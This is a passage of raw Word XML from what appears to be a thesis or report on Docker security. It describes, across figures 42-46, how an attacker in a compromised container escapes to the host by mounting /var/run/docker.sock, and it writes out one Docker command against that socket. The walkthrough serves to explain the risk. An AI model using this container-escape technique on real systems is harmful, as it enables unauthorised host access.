        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t xml:space="preserve">alpine base image </w:t>
      </w:r>
      <w:r w:rsidR="007E66C7">
        <w:t xml:space="preserve">includes </w:t>
      </w:r>
      <w:r w:rsidR="004A61E0">
        <w:t>most command-line tools</w:t>
      </w:r>
      <w:r w:rsidR="005D2230">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E4A34">
        <w:t xml:space="preserve"> Thus, the attacker can leverage </w:t>
      </w:r>
      <w:r w:rsidR="00C06812">
        <w:t>the features of the alpine</w:t>
      </w:r>
      <w:r w:rsidR="00814372">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094905">
        <w:t xml:space="preserve">image to further </w:t>
      </w:r>
      <w:r w:rsidR="00494293">
        <w:t xml:space="preserve">his/her </w:t>
      </w:r>
      <w:r w:rsidR="0005151A">
        <w:t>attacks on the compromised container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60257A" w14:textId="2B0D344E" w:rsidR="00E90005" w:rsidRDefault="00E90005" w:rsidP="00E90005">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F90B1A" wp14:editId="1AE3EB33">
            <wp:extent cx="4874260" cy="223774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874260" cy="2237740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C6436" w14:textId="1B9CAE67" w:rsidR="00F82326" w:rsidRDefault="00F82326" w:rsidP="00A21C92">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc86858633"/>
      <w:bookmarkStart w:id="168" w:name="_Toc86867523"/>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A21C92" w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alpine ssh to the con_nossh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="3120C2ED" w14:textId="3D78E552" w:rsidR="00E90005" w:rsidRDefault="007243F0" w:rsidP="00597904">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C724DA">
        <w:t xml:space="preserve">ttackers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00C724DA">
        <w:t xml:space="preserve">need to track which </w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t xml:space="preserve"> or resources they </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t>landed</w:t>
      </w:r>
      <w:r>
        <w:t>, especially</w:t>
      </w:r>
      <w:r w:rsidR="00455540">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C29EE">
        <w:t>exploring,</w:t>
      </w:r>
      <w:r w:rsidR="00177E12">
        <w:t xml:space="preserve"> and exploiting</w:t>
      </w:r>
      <w:r w:rsidR="000F0B30">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0016656B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000F0B30">
        <w:t>Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00DB479B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D16E4">
        <w:t xml:space="preserve">In such cases, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00230B9F">
        <w:t xml:space="preserve">use the Linux command in figure 43 to </w:t>
      </w:r>
      <w:r w:rsidR="004B3232">
        <w:t>identify the system</w:t>
      </w:r>
      <w:r w:rsidR="00153008">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D37CB">
        <w:t xml:space="preserve"> The output shows that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00CC24FD">
        <w:t>landed on a container</w:t>
      </w:r>
      <w:r w:rsidR="00E90FEE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23EB9A" w14:textId="70116653" w:rsidR="00E90FEE" w:rsidRDefault="00E90FEE" w:rsidP="00E90FEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C11FC2" wp14:editId="4CA3BC7A">
            <wp:extent cx="4203700" cy="1677101"/>
            <wp:effectExtent l="0" t="0" r="635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217585" cy="1682641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F73A3" w14:textId="39181814" w:rsidR="00451839" w:rsidRDefault="00451839" w:rsidP="00471135">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc86858634"/>
      <w:bookmarkStart w:id="170" w:name="_Toc86867524"/>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00471135" w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifying the systems</w:t>
      </w:r>
      <w:r w:rsidR="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="47864E12" w14:textId="62D2C520" w:rsidR="00471135" w:rsidRDefault="00652D24" w:rsidP="00471135">
      <w:r>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidR="009302A1">
        <w:t>far,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker is </w:t>
      </w:r>
      <w:r w:rsidR="00DF4B15">
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00F93751">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B65A39">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00F83219">
        <w:t xml:space="preserve"> how can</w:t>
      </w:r>
      <w:r w:rsidR="00B549A8">
        <w:t xml:space="preserve"> the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00342606">
        <w:t>escape</w:t>
      </w:r>
      <w:r w:rsidR="00D310F5">
        <w:t xml:space="preserve"> to the Docker host?</w:t>
      </w:r>
      <w:r w:rsidR="007D17AF">
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r w:rsidR="00487A27">
        <w:t xml:space="preserve">this instance, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="004E59A9">
        <w:t>launched another container</w:t>
      </w:r>
      <w:r w:rsidR="00C46F8E">
        <w:t xml:space="preserve">, mounting the Docker socket </w:t>
      </w:r>
      <w:r w:rsidR="00DB1F81">
        <w:t xml:space="preserve">to run </w:t>
      </w:r>
      <w:r w:rsidR="005501CD">
        <w:t>Docker commands</w:t>
      </w:r>
      <w:r w:rsidR="005F4BC5">
        <w:t xml:space="preserve"> and access the host system</w:t>
      </w:r>
      <w:r w:rsidR="005501CD">
        <w:t>, as shown in figure 44.</w:t>
      </w:r>
      <w:r w:rsidR="00552405">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00D908EB">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="002212D0">
        <w:t xml:space="preserve">allows </w:t>
      </w:r>
      <w:r w:rsidR="00B12C67">
        <w:t>the attacker to run Docker commands</w:t>
      </w:r>
      <w:r w:rsidR="00427AE2">
        <w:t xml:space="preserve"> because it is mounted to the Docker daemon socke</w:t>
      </w:r>
      <w:r w:rsidR="00B65A39">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00427AE2">
        <w:t xml:space="preserve"> via API.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C3A">
        <w:t xml:space="preserve"> Simply put, the </w:t>
      </w:r>
      <w:r w:rsidR="00A2698C">
        <w:t>volume /var/run/</w:t>
      </w:r>
      <w:r w:rsidR="00FC363A">
        <w:t xml:space="preserve">docker.sock </w:t>
      </w:r>
      <w:r w:rsidR="00B01DE5">
        <w:t>is shared with the container.</w:t>
      </w:r>
      <w:r w:rsidR="008000F9">
        <w:t xml:space="preserve"> The /var/run/docker.sock is a Unix domain socket that allows </w:t>
      </w:r>
      <w:r w:rsidR="00A239C9">
        <w:t>different processes to communicate</w:t>
      </w:r>
      <w:r w:rsidR="00810813">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F00D62">
        <w:t xml:space="preserve"> Therefore, this container </w:t>
      </w:r>
      <w:r w:rsidR="00C407BA">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="005B4361">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA16B0">
        <w:t xml:space="preserve">run Docker-like things </w:t>
      </w:r>
      <w:r w:rsidR="00C407BA">
        <w:t>on the Docker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FB922" w14:textId="2EBC87C2" w:rsidR="002212D0" w:rsidRDefault="002212D0" w:rsidP="00676AEC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C5B75F" wp14:editId="1282607E">
            <wp:extent cx="5422900" cy="28864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22900" cy="288648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B0E9FB" w14:textId="2D31B8B9" w:rsidR="00676AEC" w:rsidRDefault="00676AEC" w:rsidP="00C5787D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc86858635"/>
      <w:bookmarkStart w:id="172" w:name="_Toc86867525"/>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">launching </w:t>
      </w:r>
      <w:r w:rsidR="00EF26A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ocker </w:t>
      </w:r>
      <w:r w:rsidR="00EF26A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mounted </w:t>
      </w:r>
      <w:r w:rsidR="00C5787D" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to the Docker daemon.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="0CF18BF4" w14:textId="2136E701" w:rsidR="00F17DD5" w:rsidRPr="0026469A" w:rsidRDefault="008B50DF" w:rsidP="00F17DD5">
      <w:r>
        <w:t xml:space="preserve">By default, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t>daemon listens</w:t>
      </w:r>
      <w:r w:rsidR="00BF0895">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005044ED">
        <w:t xml:space="preserve">API calls </w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="005044ED">
        <w:t xml:space="preserve"> /var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="002A5D28">
        <w:t xml:space="preserve"> Unix socket.</w:t>
      </w:r>
      <w:r w:rsidR="00C147B8">
        <w:t xml:space="preserve"> Also</w:t>
      </w:r>
      <w:r w:rsidR="00AD31CE">
        <w:t xml:space="preserve">, containers communicate with the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00EF7907">
        <w:t xml:space="preserve">through this Unix socket, and thus the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00AB09BC">
        <w:t>access the host system and bypass one level</w:t>
      </w:r>
      <w:r w:rsidR="004E4264">
        <w:t>, as shown in figure 45.</w:t>
      </w:r>
      <w:r w:rsidR="0090302F">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="0090302F" w:rsidRPr="0090302F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker -H unix:///var/run/docker.sock ps -a</w:t>
      </w:r>
      <w:r w:rsidR="0090302F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="0026469A">
        <w:t xml:space="preserve">enabled the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00BC0E2F">
        <w:t xml:space="preserve">access the host shell and </w:t>
      </w:r>
      <w:r w:rsidR="00BC32F3">
        <w:t>identify other containers running on the Docker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECEB405" w14:textId="47149FBB" w:rsidR="006A2BBE" w:rsidRDefault="006A2BBE" w:rsidP="006A2BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725ADD48" wp14:editId="520A9928">
            <wp:extent cx="5403850" cy="6322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403850" cy="632225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40944F" w14:textId="41208BFB" w:rsidR="002128E6" w:rsidRPr="00FD330A" w:rsidRDefault="002128E6" w:rsidP="00FD330A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc86858636"/>
      <w:bookmarkStart w:id="174" w:name="_Toc86867526"/>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FD330A" w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifying things on the host system.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="179DE611" w14:textId="16057357" w:rsidR="005922DC" w:rsidRDefault="007F2922" w:rsidP="005922DC">
      <w:r>
        <w:t xml:space="preserve">At this stage, the attacker can also see what images are running on the </w:t>
      </w:r>
      <w:r w:rsidR="005F3F61">
        <w:t>Docker host.</w:t>
      </w:r>
      <w:r w:rsidR="009C6A6A">
        <w:t xml:space="preserve"> The output in figure 46 shows </w:t>
      </w:r>
      <w:r w:rsidR="00F107DD">
        <w:t xml:space="preserve">all the Docker images </w:t>
      </w:r>
      <w:r w:rsidR="00CF30E6">
        <w:t>on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C8489" w14:textId="116B70B0" w:rsidR="00005A93" w:rsidRDefault="00005A93" w:rsidP="00005A93">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41002413" wp14:editId="4DF6C2BF">
            <wp:extent cx="4845050" cy="1674779"/>
            <wp:effectExtent l="0" t="0" r="0"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845050" cy="1674779"/>
                    </a:xfrm>
